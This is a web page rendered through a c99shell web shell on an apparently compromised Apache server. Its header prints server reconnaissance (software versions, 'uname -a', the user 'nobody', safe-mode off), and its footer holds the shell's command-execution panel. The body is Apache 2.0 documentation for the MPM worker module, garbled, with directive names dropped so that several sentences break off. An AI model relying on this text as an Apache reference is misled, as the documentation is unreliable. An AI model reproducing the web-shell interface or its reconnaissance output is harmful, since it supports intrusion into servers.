Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 uid=99(nobody) gid=98(nobody) groups=98(nobody) Safe-mode: OFF (not secure) /usr/local/apache2/manual/mod/ drwxr-xr-x | |
| Viewing file: Select action/file-type: Apache HTTP Server Version 2.0 ![]() Apache MPM worker
SummaryThis Multi-Processing Module (MPM) implements a hybrid multi-process multi-threaded server. By using threads to serve requests, it is able to serve a large number of requests with less system resources than a process-based server. Yet it retains much of the stability of a process-based server by keeping multiple processes available, each with many threads. The most important directives used to control this MPM are
Directives
TopicsSee alsoHow it WorksEach process has a fixed number of threads. The server adjusts to handle load by increasing or decreasing the number of processes. A single control process is responsible for launching child
processes. Each child process creates a fixed number of threads as
specified in the Apache always tries to maintain a pool of spare or
idle server threads, which stand ready to serve incoming
requests. In this way, clients do not need to wait for a new
threads or processes to be created before their requests can be
served. The number of processes that will initially launched is
set by the A typical configuration of the process-thread controls in
the
While the parent process is usually started as
|
:: Command execute :: | |
--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.019 ]-- |